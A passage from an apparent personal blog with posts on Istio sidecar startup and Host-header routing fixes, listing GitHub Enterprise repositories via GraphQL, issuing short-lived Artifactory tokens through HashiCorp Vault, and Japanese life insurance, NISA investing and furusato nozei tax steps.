This is where the issue comes from: if our application container starts sending network calls before the istio sidecar container is ready to handle them, these calls will fail. And if the application can’t handle this failure gracefully, then the whole container can fail. This should lead to a failing health check, and kubernetes restarting the Pod. However when the Pod restarts, all of its containers get restarted, so it will likely go into the same failure.

The solution

Set the proxy.istio.io/config: '{ "holdApplicationUntilProxyStarts": true }' annotation on the Pod

For example:

apiVersion: v1
kind: Pod
metadata:
  name: my-app
  annotations:
    proxy.istio.io/config: '{ "holdApplicationUntilProxyStarts": true }'
spec:
  containers:
  - name: main
    image: my-app:1.14.2

Or on a Deployment:

apiVersion: apps/v1
kind: Deployment
metadata:
  name: my-app-deployment
  labels:
    app: my-app
spec:
  replicas: 3
  selector:
    matchLabels:
      app: my-app
  template:
    metadata:
      labels:
        app: my-app
      annotations:
        proxy.istio.io/config: '{ "holdApplicationUntilProxyStarts": true }'
    spec:
      containers:
      - name: main
        image: my-app:1.14.2

Setting this annotation overrides the default ProxyConfig defined in the istio config (override logic described here). The docs define the holdApplicationUntilProxyStarts setting as:

Boolean flag for enabling/disabling the holdApplicationUntilProxyStarts behavior. This feature adds hooks to delay application startup until the pod proxy is ready to accept traffic, mitigating some startup race conditions. Default value is ‘false’.

This is exactly the solution to our problem.

Future

The upcoming ambient mesh setup will get rid of sidecars, which will likely eliminate this issue altogether. However at the time of writing this (November 2023) ambient mesh is still in alpha and not recommended for production deployments, so it might be a while until it becomes widespread.

Also kubernetes released first-class support for sidecars recently (in alpha still) which istio already supports. This change allows the istio initContainer to stay alive for the entire lifetime of the Pod, also likely solving this issue.

Until one of these become stable however, the best course of action is likely to add that annotation (or configure this behavior for the entire mesh).

A look at life insurance in Japan

2023-11-23T00:00:00+00:00

I’m starting a family, so I’ve been recently thinking about life insurance to ensure they won’t have financial hardship if I pass early. In this article I’ll review what I found. Please remember that I’m not a professional, and none of this is financial or tax advice. As always, do your own research.

Life insurance is a contract between a life insurance company and a policy owner. A life insurance policy guarantees the insurer pays a sum of money to one or more named beneficiaries when the insured person dies in exchange for premiums paid by the policyholder during their lifetime.

From investopedia.com

Unless otherwise noted, the comparisons below use me, a 30 years old man as the example.

There are multiple types of life insurance:

1. Whole Life Insurance (終身保険)

A whole life insurance never expires: you sign a contract, and as long as you pay the monthly premiums (which is usually a fixed amount), you will receive the defined amount at your death.

Since eventually everyone dies, with this type of insurance the insurance company is guaranteed to pay. This makes these plans more expensive than other plans, but can allow extra benefits like withdrawing from the policy while still alive or borrowing against it. (This is based on an American source, so it might be different in Japan.)

Looking at kakaku.com’s comparison for whole life insurance, the top 1 result pays 2 million yen at death and costs 2,508 yen/month. Assuming I die at the ago of 80, in the next 50 years this would make me pay 1,504,800 yen. This is lower than what the insurance pays due to the money loosing value over time (inflation) and as the insurance company likely invests this money.

The maximum amount kakaku can filter for is 10 million yen which returns a single insurance with 14,620 yen/month contribution.

2. Term Life Insurance (定期保険)

Term life insurance, as the name implies, is only good for a certain period of time, e.g. 10, 20, 30 years. You pay a monthly premium during this time, and if you die during this time, then your beneficiary receives the predefined amount of money. If the term passes and you are still alive, then the contract ends and you don’t receive anything.

This type of insurance can be pretty cheap for young people, as most policy holders won’t die during the term, so the insurance company can use all of their contributions to pay out the small amount of people that died. This insurance also matches my needs better: I want to take care of my family until our kids become independent.

The top result on kakaku is for 10 years, pays 10 million yen in case of death and costs 1,068 yen monthly. Note that the whole life insurance for the same amount costs 14,620 yen/month, more than 10 times more.

As the term increases, the chance of policy holders dying also goes up, resulting in increased monthly costs. For example a 25 year term insurance (going until I’m 55) would cost 990 yen/month, but only pay 5 million yen (half than the 10 year term).

3. Income Protection Insurance (収入保障保険)

This seems to be more common in the UK and Australia, but not so much in the US. My understanding is that this is similar to a term life insurance, but instead of paying out a lump sum at death, it provides monthly payments to the beneficiary (usually until the end of the term).

There is an important concept here called 確定保証期間 (guaranteed coverage period). Normally these insurances pay the benefit under their term ends, but if you die close to the end of the term, this guaranteed coverage period ensures that the beneficiary receives the benefit for at least this long. For example, if the insurance period is 10 years and you die in the 9th year, but the guaranteed coverage period is 2 years, benefits will be paid for 2 years. If you die in the 7th year, then the benefit is paid until the 10th year, so for 3 years.

Also some of the income protection insurances will pay you if you become disabled or otherwise unable to work (not only in case of death).

The major benefit of this insurance is that it maps the need (taking care of one’s family) better, especially if one dies early. On the other hand, the chances of dying early are pretty low, so the insurance company can keep the fees lower than a comparable term life insurance.

Again at kakaku the top result has a period until 65 (25 years long), has a benefit of 100,000 yen per month and costs 2,072 yen monthly. This has a guaranteed coverage period of 2 years.

Going for a higher benefit amount, kakaku tops out at 150,000 yen for 3,003 yen (also running until the age of 65).

Sony Family Income Insurance (ソニー生命の家族収入保険)

The income protection insurance seem to cover my needs the best (having a monthly payout until the kids become independent, regardless of when I die), so I looked into it more and found one offering from Sony called 家族収入保険. There is no online calculator (one has to signup for an online consultation), but their example has these numbers for a 25 year insurance period, 200,000 yen monthly benefit and guaranteed coverage period of 5 years the permiums are as follows:

	30 years old	35 years old	40 years old	45 years old
man	4,100 yen	5,800 yen	8,460 yen	12,580 yen
woman	3,260 yen	4,380 yen	5,760 yen	7,720 yen

The cost goes up pretty quickly with age which makes sense, as the length of insurance being the same, the end of the coverage gets pushed higher and higher from 55 years to 70 years making it much more likely that people will claim it.

Sony also has extra discounts for being healthy, along two categories: non-smoker (非喫煙者) and healthy body (優良体). Their example for this (source, bottom of page 3) assumes starting at 35 years old, 25 year period (so until 60), 250,000 yen monthly benefit and guaranteed coverage period of 2 years:

	Non-smoker with healthy body	Non-smoker standard rate	Smoker with healthy body	Smoker standard rate
man	6,425 yen	7,825 yen	7,800 yen	9,200 yen
woman	5,250 yen	6,250 yen	6,250 yen	7,225 yen

So both not smoking and passing their healthy body test reduces the premiums by ~15% each, with one passing both saving around 30% (27% for women).

To buy Sony’s life insurance, one has to have to meet their “Life Planner” (either in person or online) who will assess their situation and (supposedly) recommend the best solution from their portfolio. On their website they say that the initial consultation is free and one does not have to sign up to an insurance with them.

A Japanese blog notes that while on price alone Sony is not the best (even with the discounts), but this free consultation (which continues throughout the term of the insurance) can make it a good choice for some.

(I’m not sure if Sony’s insurance is the best choice, I just happened to look into it more and found the way the premiums change interesting.)

My conclusion

Overall my takeaway is that the Income Protection Insurance (収入保障保険) matches my needs the most, but also that this needs to be considered in a wider life/financial plan:

many mortgages have a built-in life insurance - so if the owner dies, the remaining mortgage gets cancelled
the needs of the extended family. Do you need to support your parents (and others) financially, or could/would they likely step in and help your spouse out if you pass?
your and your spouse’s investments - after considering inheritance taxes, how far would these get your family?
the income of your spouse (and their income prospect, in case of small kids at the moment)

Considering all of this, you might realize that you don’t really need insurance after all. And as with all financial decisions, discuss it with your spouse and make a decision together.

Investing plans with the upcoming new NISA

2023-11-16T00:00:00+00:00

From 2024, Japan’s tax-free investment system, NISA, is getting a major overhaul. Investments made within the system are tax-free (no dividend and capital gain tax), with the only major limitation on yearly and lifetime contribution limits, and that a third of the limits can only be used for mutual funds. This is not a retirement scheme, and there is no penalty for selling early. In this post I will review how I plan to invest from 2024.

What to invest in

Going with the general advice and the “Diversification is the only free lunch” principle, I’ll continue to invest in low-cost diversified index funds or ETFs.

Which index?

Many people invest in S&P500 (the 500 largest companies of the US), which had exceptional returns in most of the last century as America became the leading economic power in the world. There are similar indexes in other countries (e.g. Nikkei 225 for Japan, or DAX for Germany), and some people prefer to invest in companies of their own country.

To me picking a country and hoping that it continues to do well seems like only doing half of the diversification. Will China overtake the US, or will China become the next Japan? Will India or Indonesia be the next China? Will the EU’s or Japan’s economy wake up? I don’t think anybody knows the answer to these questions, especially not at the timeframe I’m investing (majority of it is for retirement 30-40 years from now).

Thus I invest in index funds or ETFs that track the entire world economy. This way as long as the world economy continues to grow, I will make money.

Is it possible that this assumption is incorrect? Of course. Population is declining in most advanced economies, and population growth is slowing globally too. The UN expects population to peak around 2080 with most of the growth coming from the period until 2050. The world has never seen widespread population decline, so we don’t know how this will affect the economy. However with declining population other investments are also risky: the price of real estate, and precious metals are both driven ultimately by demand, which might decline with less people, and with the ever increasing amounts of government debt, money printing leading to inflation seems also a likely possible future for many countries. So I think that overall investing in the entire global economy is still the best course of action.

Which fund/ETF?

I already looked at the existing all-world ETFs in my earlier post. A few learnings I took since then:

Always invest in yen denominated securities. This is mostly due to how Japanese taxes work: capital gains are taxed at a fix 20%, but forex gains are considered miscellaneous income and taxed at the marginal tax rate (30-40%). Moreover these two being a different tax category, I believe they can’t be used to offset each other. Moreover forex gains are not tax-free in NISA. [edit] I was wrong, this doesn’t matter.
If possible, find a fund that reinvests dividends. The new NISA has contributions limits only, but the amount in it can grow indefinitely. Automatically reinvesting dividends thus increases the tax-free investment amount.
Stay away from currency-hedged investments. Recently the yen dropped to historical lows against the dollar, so some people are looking at funds that provide currency hedge (e.g. if the S&P500 goes from $4500 to $4950, then the fund’s value in yen will also increase 10%, regardless of the exchange rate change). This sounds good, however it comes at a huge cost that’s often hidden in the fund descriptions. This cost eats into the profit on long time horizons, while currency fluctuation tends to even out in decades.
Avoid funds that wrap other funds to limit double/triple taxation

I found that eMaxis Slim All Country (ｅＭＡＸＩＳＳｌｉｍ全世界株式（オール・カントリー）) fits all of these with a low, 0.1144％ yearly fee (this is not too bad even compared to Vanguard’s VT’s 0.07% fee). If you are looking for an alternative, I recommend checking out the other eMaxis Slim funds as they are all pretty low-fee, yen denominated, and they all reinvest the dividends.

When to invest?

The new NISA has a yearly limit of 3.6 million yen. Assuming the entire amount is available in January, is it better to invest it immediately or to split it into 12 parts and invest each month?

These two strategies are commonly referred to as lump-sum investing and (dollar) cost averaging. Research finds that lump-sum investing is a better strategy:

Using MSCI World Index returns for 1976–2022, Finlay and Zorn calculated that LS [lump-sum] outperformed CA [cost averaging] 68% of the time across global markets measured after one year.

This makes sense: if we expect markets to go up on the long term (which has been true historically for most markets and timeframes), then investing everything early ensures we get all the returns. In other words, while prices fluctuate, in average it is more likely that prices later will be higher than earlier.

On the other hand this also means that 32% of the times cost averaging was more beneficial and the research also notes:

But for some risk-averse investors, a CA approach may be more suitable, because it reduces the risk of drawdown or even abandoning their investment plan altogether because they fear large losses.

I understand this as: investing all the money at once, then market drops, feeling bad about it and potentially selling at a loss. While with cost averaging if the market drops after the first investment, one can more easily look at the bright side that next month they will invest at a lower price.

One other thing to note: some brokerages have campaigns that gives you points for investing using a credit card up to a certain amount (SBI has one for investing 50,000 yen/month from an SMBC card). Investing using a credit card sounds like a pretty bad financial decision, but if you can pay it off next month, then it is just free points (which are essentially money).

So my plan: every month invest only the amount that maxes out any campaign, and invest everything else in January as lump-sum.

istio-proxy 'NR filter_chain_not_found' / upstream connect error or disconnect/reset before headers. reset reason: connection termination

2023-08-10T00:00:00+00:00

I deployed a vendor’s software on kubernetes and the website showed this error message:

upstream connect error or disconnect/reset before headers. reset reason: connection termination

Looking at the istio-proxy sidecar logs on the Pod I could see an error message:

kubectl logs -c istio-proxy app-ui-543875cf14-a2b33
[2023-08-09T06:06:22.268Z] "- - -" 0 NR filter_chain_not_found - "-" 0 0 0 - "-" "-" "-" "-" "-" - - 10.20.223.206:8080 10.20.221.213:42304 - -

The app was setup like this: the request hit the istio ingress, which forwarded the request to the app-gateway Service. The app-gateway Pod then routed the request to the approriate Service (acting essentially as a reverse proxy).

The app-gateway Pod could reach app-ui via curl just fine:

kubectl exec -it app-gateway-78954c5f7b-5pwt5 -- curl 'http://app-ui:8080'
<!DOCTYPE html>
<html lang="en">
  <head>
...

The issue turned out to be this: when app-gateway forwarded the request, it didn’t rewrite the Host header. This is not an issue on normal kubernetes deployments, but istio’s envoy sidecar checks the Host header and as that didn’t match the Pod (the hostname only had a VirtualService entry pointing to app-gateway), it didn’t forward the request.

Setting the Host header manually resulted in the original error message:

kubectl exec -it app-gateway-78954c5f7b-5pwt5 -- curl --header 'Host: my-app.example.com' 'http://app-ui:8080'
upstream connect error or disconnect/reset before headers. reset reason: connection termination

Solution: gateway needed to rewrite the Host header to match the destination hostname, in this case: http://app-ui:8080. One this was done, it started to work as expected.

How to get all repositories of an enterprise on GitHub Enterprise Cloud

2023-08-06T00:00:00+00:00

GitHub Enterprise Cloud is an enterprise version of GitHub.com “designed for large businesses or teams who collaborate on GitHub.com”(source). There is a strong emphasis on security, which extends to strong limits on programmatic access, especially to enterprise-wide resources, so getting all organizations or all repositories of the enterprise becomes non-trivial. This guide will describe how to do just these.

Goal

The goal is to get all current and future organizations and repositories that belong to the enterprise. It needs to handle new organizations added without additional configuration.

So on a high level: we need an identity with enough permissions to access these resources, then use that identity to call an API. GitHub has a REST API that looks like it could work.

What doesn’t work

While the docs mention the use-case of machine accounts these use licenses, so it is generally recommended to use GitHub Apps instead. However GitHub Apps can only be installed either on repositories or on organizations, so while this could work, it would need to be installed on all new orgs manually (there doesn’t seem to be any API that would install GitHub apps). So we have to use machine accounts.

Authenticating with a machine account’s username and password is not supported, so we have to use tokens.

There are two types of tokens:

Fine-grained personal access tokens: these are scoped to a single organization, so won’t work for us
Personal access tokens (classic): these are can access the entire enterprise, so generating them for a machine account that has sufficient permissions coud work. However there is a problem if orgs in the enterprise enforce SAML single sign-on (SSO) for authentication: one needs to authorize the token for each of these orgs manually. This again doesn’t fit our use-case.

GraphQL to the rescue

So all of the above is based on the REST API docs, but Gihub also has a GraphQL API with different controls on the token. One can get all orgs of an enterprise using this query:

query {
    enterprise(slug: "NAME_OF_THE_ENTERPRISE") {
        organizations(first: 100) {
            nodes {
                login
            }
        }
    }
}

Unfortunately this doesn’t work with GitHub Apps, however it works with any user of the enterprise and it returns all organizations, including the ones the user is not a member of.

To try it generate a classic PAT for your account with the following scopes:

read:enterprise
read:org
repo:status
public_repo

(Some of these are only required for getting the repos too, so if you only need the list of orgs, you won’t need all of them). Authorize the token for just one organization (again this might only be necessary for getting the repos), then run:

curl -H "Authorization: bearer $PAT" -X POST -d " \
 { \
   \"query\": \"query {enterprise(slug:\\\"NAME_OF_THE_ENTERPRISE\\\") {organizations(first: 100) {nodes { login } } } }\" \
 } \
" https://api.github.com/graphql

Going one step further, we can also query all the repositories within the org:

query {
    enterprise(slug: "NAME_OF_THE_ENTERPRISE") {
        organizations(first: 100) {
            nodes {
                login,
                repositories(first: 100) {
                    nodes {
                        name
                    }
                }
            }
        }
    }
}

Or the same with curl:

curl -H "Authorization: bearer $PAT" -X POST -d " \
 { \
   \"query\": \"query {enterprise(slug:\\\"NAME_OF_THE_ENTERPRISE\\\") {organizations(first: 100) {nodes { login, repositories(first: 100){nodes{name}}  } } } }\" \
 } \
" https://api.github.com/graphql

The interesting thing is that even if the PAT is only authorized for a single organization, this will return repositories for all organizations (assuming the user has permissions to see them). This means that running this with a machine user that is enterprise admin should return all repositories.

Sidenote: if you want the repository name to include the org (so octo-org/octo-repo instead of octo-repo), use nameWithOwner instead of name. Of course you can also reconstruct it from the org login and the repo name.

Final hurdle: pagination

The above query works, however it only returns the first 100 organizations, and the first 100 repositories for each of those organizations. (This is a limitation of the GitHub GraphQL API so setting it to a higher number won’t work.) This might be an acceptable limitation for some usecases, but if there is a chance of having more than 100 orgs or more than 100 repositories in an org, then we need to handle pagination.

This guide describes how to paginate through the GitHub GraphQL API with Python, so applying it to our GraphQL calls I put together this script:

import os

import yaml
from python_graphql_client import GraphqlClient

GH_PAT = os.environ["GH_PAT"]

client = GraphqlClient(endpoint="https://api.github.com/graphql")

# Pagination based on
# https://til.simonwillison.net/github/graphql-pagination-python
def get_orgs_query(after=None):
    return """
    query {
        enterprise(slug: "NAME_OF_THE_ENTERPRISE") {
            organizations(first: 100, after:AFTER) {
                nodes {
                    login
                }
                pageInfo {
                    hasNextPage
                    endCursor
                }
            }
        }
    }
    """.replace(
        "AFTER", f'"{after}"' if after else "null"
    )


def get_repos_query(org_name, after=None):
    return """
    query {
        organization(login: "ORGNAME") {
            repositories(first: 100, after:AFTER) {
                nodes {
                    name
                }
                pageInfo {
                    hasNextPage
                    endCursor
                }
            }
      }
    }
    """.replace(
        "ORGNAME", org_name
    ).replace(
        "AFTER", f'"{after}"' if after else "null"
    )


organizations = []
hasNextPage = True
afterCursor = None

print("Getting organizations")

while hasNextPage:
    data = client.execute(
        query=get_orgs_query(afterCursor),
        headers={"Authorization": f"Bearer {GH_PAT}"},
    )
    if (
        "enterprise" in data["data"]
        and "organizations" in data["data"]["enterprise"]
        and "nodes" in data["data"]["enterprise"]["organizations"]
    ):
        for org in data["data"]["enterprise"]["organizations"]["nodes"]:
            organizations.append({"name": org["login"], "repositories": []})
    else:
        print("Response missing expected field. Got:")
        print(data)
    hasNextPage = data["data"]["enterprise"]["organizations"]["pageInfo"]["hasNextPage"]
    afterCursor = data["data"]["enterprise"]["organizations"]["pageInfo"]["endCursor"]

print("Got organizations: ")
print(organizations)
print("-----------------------------")

for org in organizations:
    print("Getting repos for org: " + org["name"])
    hasNextPage = True
    afterCursor = None
    while hasNextPage:
        data = client.execute(
            query=get_repos_query(org["name"], afterCursor),
            headers={"Authorization": f"Bearer {GH_PAT}"},
        )
        if (
            "organization" in data["data"]
            and "repositories" in data["data"]["organization"]
            and "nodes" in data["data"]["organization"]["repositories"]
        ):
            for repo in data["data"]["organization"]["repositories"]["nodes"]:
                org["repositories"].append(repo["nameWithOwner"])
        else:
            print("Response missing expected field. Got:")
            print(data)
        hasNextPage = data["data"]["organization"]["repositories"]["pageInfo"][
            "hasNextPage"
        ]
        afterCursor = data["data"]["organization"]["repositories"]["pageInfo"][
            "endCursor"
        ]

print("-----------------------------")
print("Organizations and repositories collected:")
print(yaml.dump(organizations)) # or print(json.dumps(organizations, indent=4))

Installing the dependencies:

pip3 install python-graphql-client pyyaml

Now you have it, a programmatic way to get all current and future orgs and repositories of the enterprise. TLDR steps once again:

Create a machine account with enterprise admin priviledges (so that it can see all orgs and repositories)
Create a Classic Personal Access Token for the account with the following scopes:
- read:enterprise
- read:org
- repo:status
- public_repo
Authorize the PAT for at least one organization
Run the above python script using the PAT

Using vault-plugin-secrets-artifactory to generate short-lived Artifactory tokens with a non-admin user

2023-08-02T00:00:00+00:00

How to use the HashiCorp Vault Secrets Plugin for Artifactory to create short-lived Artifactory tokens scoped to a specific user, without the need for an admin token. The main usecase for this is CI workflows (e.g. Github actions) that can authenticate to vault (e.g. Github’s workflow OIDC) and need access to Artifactory.

vault-plugin-secrets-artifactory’s README mentions that it works with non-admin users, but falls short on detailing how to use it in practice. This guide will go through this.

1. Install the plugin

Install the vault plugin following these instructions. This only has to be done once per vault instance.

2. Get an Artifactory Identity Token

Login with the Artifactory user that you will use, and generate an Identity Token. Important: don’t use the API Key, as it lets you configure the vault backend, but when you try to generate a token it fails with this error:

$ vault read artifactory/token/test
Error reading artifactory/token/test: Error making API request.

URL: GET http://vault:8200/v1/artifactory/token/test
Code: 500. Errors:

* 1 error occurred:
        * could not get the sytem version: HTTP response 401

Also note the username (email address) as we will need it in the next steps.

3. Create the backend in vault

Create the artifactory backend in vault by

vault secrets enable artifactory -path=artifactory

or via terraform:

resource "vault_mount" "artifactory" {
  path        = "artifactory"
  type        = "artifactory"
  description = "To create Artifactory tokens"
}

4. Configure the backend with the Artifactory token

Use your artifactory’s URL and the Artifactory Identity Token from the earlier step:

vault write artifactory/config/admin \
    url=https://artifactory.example.org \
    access_token=$TOKEN

or the same via terraform:

resource "vault_generic_endpoint" "config" {
  path = "${vault_mount.artifactory.path}/config/admin"

  # Prevents resource from being recreated each time the token is rotated
  lifecycle {
    ignore_changes = [data_json]
  }

  data_json = <<-EOT
{
  "url": "${local.artifactory_host}",
  "access_token": "${var.initial_artifactory_token}"
}
EOT
}

The docs recommend rotating the token so that only vault knowns it, but that didn’t work for me with non-admin tokens.

5. Create a role

Configure a role (an identity the Artifactory plugin can issue tokens for). Use the username for the user that the token belongs to.

vault write artifactory/roles/test \
    username="my-user@example.com" \
    scope="applied-permissions/user" \
    default_ttl=1h max_ttl=3h

or the same with terraform:

resource "vault_generic_endpoint" "test_role" {
  path = "${vault_mount.artifactory.path}/roles/test"

  data_json = <<-EOT
{
  "username": "${var.artifactory_username}",
  "scope": "applied-permissions/user",
  "default_ttl": "1h",
  "max_ttl": "3h"
}
EOT

  depends_on = [vault_generic_endpoint.config]
}

Get a short-lived Artifactory token

Assuming authenticated to vault, one can obtain a short-lived Artifactory token for this role by:

vault read artifactory/token/test

See output format here.

Alternatively with curl and jq:

ARTIFACTORY_TOKEN=$(curl \
      -H "X-Vault-Token: $VAULT_TOKEN" \
      -X GET \
      "${VAULT_URL}/v1/artifactory/token/test" | jq -j -c '.data.access_token')

Github action

If using Github actions, it is recommended to setup a jwt backend in vault to trust Github’s OIDC issuer, and configure a vault role that the workflow can to read the artifactory token path.

To set this all up in terraform:

resource "vault_jwt_auth_backend" "github" {
  path = "github"
  type = "jwt"

  bound_issuer       = "https://token.actions.githubusercontent.com"
  oidc_discovery_url = "https://token.actions.githubusercontent.com"
}

resource "vault_policy" "access-policy" {
  name = "test-artifactory-token"

  policy = <<EOT
path "${vault_mount.artifactory.path}/token/test" {
  capabilities = ["read"]
}
EOT
}

resource "vault_jwt_auth_backend_role" "access-role" {
  backend        = vault_jwt_auth_backend.github.path
  role_name      = "artifactory-access-role"
  token_policies = [vault_policy.access-policy.name]

  bound_claims = {
    "iss" : "https://token.actions.githubusercontent.com",
    "repository" : var.repository #e.g. octo-org/octo-repo
  }
  bound_claims_type = "glob"
  user_claim        = "aud"
  role_type         = "jwt"
}

Once it’s setup, add the id-token: write permission to your workflow and then do:

- name: Get Artifactory token
  uses: hashicorp/vault-action@v2
  with:
    method: jwt
    url: $
    path: github # if followed the setup above
    role: artifactory-access-role # if followed the setup above
    secrets: |
      artifactory/token/test access_token | ARTIFACTORY_TOKEN

In subsequent steps you can use $ARTIFACTORY_TOKEN or $ to get the token. Don’t worry, the hashicorp/vault-action marks the value as sensitive, so it won’t show up in the workflow logs.

Deleting the artifactory vault backend

When trying to delete the artifactory vault backend (either manually via the vault cli, on the web UI or via terraform destroy) it often gives this error:

│ Error: error deleting from Vault: Error making API request.
│ 
│ URL: DELETE https://vault:8200/v1/sys/mounts/artifactory
│ Code: 400. Errors:
│ 
│ * failed to revoke "artifactory/token/test/pugsqUqIsLfj4pJaWgraLAr4.mpllx" (1 / 1): failed to revoke entry: resp: &logical.Response{Secret:<nil>, Auth:<nil>, Data:map[string]interface {}{"error":"backend not configured"}, Redirect:"", Warnings:[]string(nil), WrapInfo:(*wrapping.ResponseWrapInfo)(nil), Headers:map[string][]string(nil)} err: %!w(<nil>)
│

My understanding is that this fails as there are tokens generated by the backend that are still valid, and vault tries to revoke them but fails (likely because the setup token is not an admin). Running the following commands seem to resolve the issue:

vault lease revoke -force -prefix artifactory
vault token revoke artifactory/token/test/pugsqUqIsLfj4pJaWgraLAr4.mpllx

Adding Furusato nozei to e-Tax

2023-07-29T00:00:00+00:00

How to indicate furusato nozei when filing taxes online. (To learn about furusato nozei, see Furusato nozei - end to end guide.)

1. Get the xml file with the furusato nozei amount

Most furusato websites provide a digitally signed xml file (寄附金控除に関する証明書, Certificate of Donation Deduction), e.g. ふるさとチョイス. Request and download this.

2. Upload the xml file to e-Tax

When filing Japanese income tax online there is a step called 所得控除の入力, Entering Income Deductions. This usually comes pre-filled with some default deductions:

To add furusato nozei, select 寄附金控除, Donation deduction, which opens this page:

Select and upload the xml file. After it parses the file, it should show the amount:

After clicking 入力 one can see all the individual donations:

Accept it with 入力終了 and it should show up in the 所得控除の入力 summary table.

That’s it. Complete the tax return, if you are eligible for tax refund, specify the way you want to receive it (e.g. bank transfer), and wait for it to arrive.

Furusato nozei - end to end guide

2023-07-29T00:00:00+00:00

What is furusato nozei, a bit of history, and how you can do it end to end. This won’t be short, but I try my best to provide the full picture with all the details. While I do my best to keep this information accurate, if you find any inaccuracies, please let me know.

1. What is furusato nozei?

Furusato nozei (ふるさと納税), or home-town tax payment is a scheme by Japan that allows Japanese tax payers to redirect part of their income tax to a city other than where they currently live. The receiving cities often send some thank you gift in exchange for this, and there are websites set up like webshops where one can choose the city based on the desired gift.

Although the original intention was to let people who moved from the countryside to the city support their old hometown, there is no requirement on which city one can redirect their tax to, and the program is open for foreigners too (as long as they pay income tax in Japan).

While in the end furusato nozei is about redirecting part of your income tax, in practice one needs to make an out of pocket donation to the desired city in a given calendar year, and then receive tax refund and/or tax break in the next calendar year equivalent to the donated amount minus 2,000 yen (this is a fixed fee for using the system). So at the end of the day, one can get some gifts in exchange for 2,000 yen plus a bit of paperwork.

2. Income tax

Furusato nozei allows one to redirect part of their income tax, so we need to understand income tax first to fully understand furusato nozei.

The income tax consist of two main parts:

the national income tax (個人所得税): a progressive tax rate of 5% to 45%
residence tax (個人住民税, individual inhabitant tax) a flat 10% split into two parts:
- Prefectural tax (都道府県民税) of 4%
- Municipal tax (区市町村民税) of 6%

Payment timelines are different for these:

national income tax is generally paid in the year when the income is received. For salaried employees their company usually withholds it, and then does a final adjustment in December (YETA, Year-End Tax Adjustment, 年末調整). If one files tax return (確定申告, kakutei shinkoku) in February-March next year, it is possible to pay more tax then or receive a tax refund.
residence tax is based on the prior calendar year’s income and calculated in June each year. So the residence tax of May 2023 is still based on the income of 2021. Then from June 2023 until May 2024 the residence tax is based on the income of 2022 and so on.

Sidenote: for foreigners this also results in not having to pay any residence tax until their second year’s June, and often a reduced amount even for that year. E.g. if someone moved to Japan in July 2021, they would start paying residence tax in June 2022, but that would be based on their 2021 income (received in Japan), which is only 6 month’s income, thus the residence tax paid from June 2022 to May 2023 will be around half of what they will need to pay from June 2023, assuming no changes in income.

Furusato nozei is deducted from both the national income tax and the residence tax using a rather complicated formula. If you have to file your taxes online, this calculation is taken care of by the website, and if you don’t need to file taxes (and using the one-step exception process described below), then the entire amount is deducted from your residence tax bill of next year.

3. The amount

Since furusato nozei is a donation, there is no upper limit on how much one can donate, but there is a limit on how much tax refund/break one can get. Since the calculation is a bit complex, the official site has some example amounts based on income and family composition. Many furusato nozei websites also have their own calculators.

It’s important to keep in mind that the maximum tax refund/break essentially depends on the amount of tax paid, so if you are eligible for any income tax deductions (dependent, medical expenses, eartquake insurance, etc.), those will reduce the amount of furusato nozei you can do. I usually leave a ~20% safety margin between what I could use (based on the online calculators) and what I actually use.

Also this depends on the tax paid in a calendar year, and due to the progressive tax rate if you are a high income earner and loose some expected income (e.g. part of your bonus), since that comes out of your highest income tax rate it will disproportionally reduce the furusato nozei amount. For example: going from 1100万円 to 1000万円 income (9% decrease) reduces the furusato nozei maximum amount from 218,000 yen to 180,000 yen (17% decrease). Thus many people often only do furusato nozei towards the end of the year, when their yearly income is mostly finalized and unlikely to change.

Also due to the progressive tax rate, the amounts grow much faster than the income:

450万円 income (national average) -> 5.2万円 furusato nozei (assuming no dependent or other deductions)
1000万円 income 18万円 furusato nozei
1500万円 income 39.5万円 furusato nozei
2000万円 income 56.9万円 furusato nozei
2500万円 income 85.5万円 furusato nozei

(source)

4. Paperwork

To receive the tax refund/break, there is some necessary paperwork with two main options:

one-stop exception: this is a simplified process for people fitting the following criteria:
- they don’t need to file tax return. This is usually company employees where the company takes care of their taxes, their income is less than 20 million yen and they don’t have any other deduction (e.g. medical expenses), or other income (e.g. capital gain/divident where the brokerage doesn’t withhold taxes).
- they only donated to 5 municipalities or less in the calendar year. The limit is on the number of donation destinations, so making multiple donations to the same city still only count as one.
If one is eligible, they should indicate this when making the donation (there is usually a checkbox on the donation website), and then the receiving city will send a form to fill out and return. Important: these forms need to arrive to the cities by January 10th the next year, which can be a problem if you donate late December, as many city halls close early for the year-end holidays.

If the municiplaity doesn’t send you the form, the Ministry of Internal Affairs has a form that one can use (see these instructions). Some donation sites also provide this form, e.g. https://www.furusato-tax.jp/about/onestop.

One also needs to attach an ID and proof of My Number to the form. This can be either the My Number card alone, or an accepted ID (e.g. residence card, driving license) and the My Number notification card. More details here.

Once the forms are returned, there is no other paperwork to do. The receiving cities notify the National Tax Agency and the city you live in (or maybe the NTA does that), and they also let your company know, so that they will withhold less taxes next year.
the normal process: if one is not eligible for the one-stop exception (they need to file tax return, or donated to more than 5 places), they need to file tax return and include furusato nozei there.
- if filing on paper: after donation the receiving city sends a certificate of donation, which one needs to include with the tax return (though I have never done this, so correct me if I’m wrong)
- if filing online: most furusato websites provide a digitally signed xml file (寄附金控除に関する証明書, Certificate of Donation Deduction) that one can simply upload to the e-Tax website. See my other post on how to do this in detail

5. Timeline

One goes to a furusato nozei website, selects the desired goods and makes a donation (the flow is very similar to shopping on a webshop, including the payment being done via credit/debit card). This can be done anytime during a calendar year, but often done towards the end of the year for a few reasons:
- the maximum amount of refund depends on the amount of tax paid in the year, which in turn depends on the income for the year. This amount is more certain towards the end of the year (otherwise loosing one’s bonus or job might reduce their income, and then they won’t be able to get refund for the entire furusato nozei donation)
- to minimize the time between making the donation and receiving the refund (the opportunity cost of not investing this money)
- furusato nozei websites often run campaigns in December (e.g. Amazon Pay often has a 2.5-3% cashback campaign (Internet Archive) during December)
One receives the donation certificate in the mail with the one-stop exception form (if requested)
One receives the selected “thank you” goods
One completes the necessary paperwork:
- One-stop exception: simply fill out and return the form sent by the receiving municipality, or
- File income tax return in February-March next year
One gets the money back in the calendar year after the donation was done (source):
- If one-stop exception was used: the residence tax will be reduced by the entire amount donated (minus 2000 yen) starting from June the year after the donation (e.g. for donations in 2022 the residence tax from June 2023 to May 2024 will be reduced)
- If tax return was filed: the tax refund/break is split into national income tax and residence tax. The national income tax part is refunded when the tax return is processed, and the residence tax portion reduces the residence tax from June (same timeline as above)

6. History

To understand the reason for this system, we need to look at the history of it.

